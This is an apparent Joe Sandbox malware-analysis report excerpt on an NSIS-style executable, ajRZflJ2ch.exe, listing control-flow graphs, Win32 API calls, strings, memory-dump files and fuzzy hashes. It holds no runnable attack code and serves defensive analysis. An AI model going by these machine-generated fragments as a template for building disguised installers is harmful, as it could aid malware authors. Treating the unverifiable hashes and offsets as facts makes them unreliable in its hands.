                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1136574915-0
                                                                                                            • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                            • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                            • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                            • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 269 403eb5-403ec2 SetWindowPos 264->269 270 403ec8-403ecb 264->270 267 40408c-404091 call 4043ab 265->267 268 40404e-404051 265->268 266->265 280 404096-4040b1 267->280 272 404053-40405e call 401389 268->272 273 404084-404086 268->273 269->270 275 403ee5-403eeb 270->275 276 403ecd-403edf ShowWindow 270->276 272->273 294 404060-40407f SendMessageW 272->294 273->267 279 40432c 273->279 281 403f07-403f0a 275->281 282 403eed-403f02 DestroyWindow 275->282 276->275 289 40432e-404335 279->289 287 4040b3-4040b5 call 40140b 280->287 288 4040ba-4040c0 280->288 284 403f0c-403f18 SetWindowLongW 281->284 285 403f1d-403f23 281->285 290 404309-40430f 282->290 284->289 292 403fc6-403fd4 call 4043c6 285->292 293 403f29-403f3a GetDlgItem 285->293 287->288 297 4040c6-4040d1 288->297 298 4042ea-404303 DestroyWindow EndDialog 288->298 290->279 296 404311-404317 290->296 292->289 299 403f59-403f5c 293->299 300 403f3c-403f53 SendMessageW IsWindowEnabled 293->300 294->289 296->279 302 404319-404322 ShowWindow 296->302 297->298 303 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 297->303 298->290 304 403f61-403f64 299->304 305 403f5e-403f5f 299->305 300->279 300->299 302->279 331 404126-40412b 303->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 303->332 310 403f72-403f77 304->310 311 403f66-403f6c 304->311 309 403f8f-403f94 call 404338 305->309 309->292 314 403fad-403fc0 SendMessageW 310->314 316 403f79-403f7f 310->316 311->314 315 403f6e-403f70 311->315 314->292 315->309 319 403f81-403f87 call 40140b 316->319 320 403f96-403f9f call 40140b 316->320 329 403f8d 319->329 320->292 328 403fa1-403fab 320->328 328->329 329->309 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->280 351 4041ff-404201 340->351 351->280 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->290 355 404244-404271 CreateDialogParamW 353->355 354->279 356 404219-40421f 354->356 355->290 357 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 355->357 356->280 358 404225 356->358 357->279 363 4042d0-4042e8 ShowWindow call 4043ab 357->363 358->279 363->290
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 3282139019-3251261122
                                                                                                            • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 395 403bc2-403bc6 390->395 391->392 393 403cd5-403cdd call 40140b 392->393 394 403c56-403c86 RegisterClassW 392->394 408 403ce7-403cf2 call 403dae 393->408 409 403cdf-403ce2 393->409 397 403da4 394->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 394->398 400 403bd8-403be4 lstrlenW 395->400 401 403bc8-403bd5 call 405cea 395->401 406 403da6-403dad 397->406 398->393 402 403be6-403bf4 lstrcmpiW 400->402 403 403c0c-403c14 call 405cbd call 4063e8 400->403 401->400 402->403 407 403bf6-403c00 GetFileAttributesW 402->407 403->384 412 403c02-403c04 407->412 413 403c06-403c07 call 405d09 407->413 419 403cf8-403d12 ShowWindow call 406752 408->419 420 403d7b-403d83 call 405523 408->420 409->406 412->403 412->413 413->403 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->409 429 403d91-403d98 call 40140b 425->429 426->397 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->409 432->433 436 403d70-403d79 call 403a28 433->436 436->406
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1642274604
                                                                                                            • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 464 403143-40314b call 402e8e 456->464 465 402fec-402ff2 456->465 459->445 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 492 4030df-4030e5 462->492 489 403139-40313e 463->489 490 40314d-40317d call 40345d call 4031d6 463->490 464->459 467 403072-403076 465->467 468 402ff4-40300c call 405e99 465->468 475 403078-40307e call 402e8e 467->475 476 40307f-403085 467->476 468->476 485 40300e-403015 468->485 475->476 477 403087-403095 call 4068b5 476->477 478 403098-4030a2 476->478 477->478 478->452 478->453 485->476 491 403017-40301e 485->491 489->445 500 403182-403185 490->500 491->476 493 403020-403027 491->493 492->459 492->463 493->476 495 403029-403030 493->495 495->476 497 403032-403052 495->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->476 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->476 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ajRZflJ2ch.exe,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ajRZflJ2ch.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\ajRZflJ2ch.exe,C:\Users\user\Desktop\ajRZflJ2ch.exe,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\ajRZflJ2ch.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-2244986074
                                                                                                            • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 511 40640a-406415 512 406417-406426 511->512 513 406428-40643e 511->513 512->513 514 406444-406451 513->514 515 406656-40665c 513->515 514->515 516 406457-40645e 514->516 517 406662-40666d 515->517 518 406463-406470 515->518 516->515 520 406678-406679 517->520 521 40666f-406673 call 4063e8 517->521 518->517 519 406476-406482 518->519 522 406643 519->522 523 406488-4064c6 519->523 521->520 527 406651-406654 522->527 528 406645-40664f 522->528 525 4065e6-4065ea 523->525 526 4064cc-4064d7 523->526 531 4065ec-4065f2 525->531 532 40661d-406621 525->532 529 4064f0 526->529 530 4064d9-4064de 526->530 527->515 528->515 538 4064f7-4064fe 529->538 530->529 535 4064e0-4064e3 530->535 536 406602-40660e call 4063e8 531->536 537 4065f4-406600 call 40632f 531->537 533 406630-406641 lstrlenW 532->533 534 406623-40662b call 40640a 532->534 533->515 534->533 535->529 540 4064e5-4064e8 535->540 549 406613-406619 536->549 537->549 542 406500-406502 538->542 543 406503-406505 538->543 540->529 545 4064ea-4064ee 540->545 542->543 547 406540-406543 543->547 548 406507-40652e call 4062b6 543->548 545->538 550 406553-406556 547->550 551 406545-406551 GetSystemDirectoryW 547->551 560 406534-40653b call 40640a 548->560 561 4065ce-4065d1 548->561 549->533 553 40661b 549->553 556 4065c1-4065c3 550->556 557 406558-406566 GetWindowsDirectoryW 550->557 555 4065c5-4065c9 551->555 554 4065de-4065e4 call 40667c 553->554 554->533 555->554 562 4065cb 555->562 556->555 559 406568-406572 556->559 557->556 567 406574-406577 559->567 568 40658c-4065a2 SHGetSpecialFolderLocation 559->568 560->555 561->554 565 4065d3-4065d9 lstrcatW 561->565 562->561 565->554 567->568 570 406579-406580 567->570 571 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 568->571 572 4065bd 568->572 573 406588-40658a 570->573 571->555 571->572 572->556 573->555 573->568
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-1230650788
                                                                                                            • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 649 4017b5-4017b6 call 40667c 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 663 4017dd-4017ef 654->663 664 4017cd-4017db CompareFileTime 654->664 657 4017f7-4017f8 call 405eb9 655->657 658 4017fd-401819 call 405ede 655->658 657->658 665 40181b-40181e 658->665 666 40188d-4018b6 call 405450 call 4031d6 658->666 663->655 664->663 667 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->667 668 40186f-401879 call 405450 665->668 680 4018b8-4018bc 666->680 681 4018be-4018ca SetFileTime 666->681 667->653 700 401864-401865 667->700 678 401882-401888 668->678 682 402ace 678->682 680->681 684 4018d0-4018db CloseHandle 680->684 681->684 688 402ad0-402ad4 682->688 685 4018e1-4018e4 684->685 686 402ac5-402ac8 684->686 689 4018e6-4018f7 call 40640a lstrcatW 685->689 690 4018f9-4018fc call 40640a 685->690 686->682 696 401901-4022fc call 405a4e 689->696 690->696 696->688 700->678 702 401867-401868 700->702 702->668
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsd88AD.tmp$C:\Users\user\AppData\Local\Temp\nsd88AD.tmp\System.dll$Call
                                                                                                            • API String ID: 1941528284-700620031
                                                                                                            • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
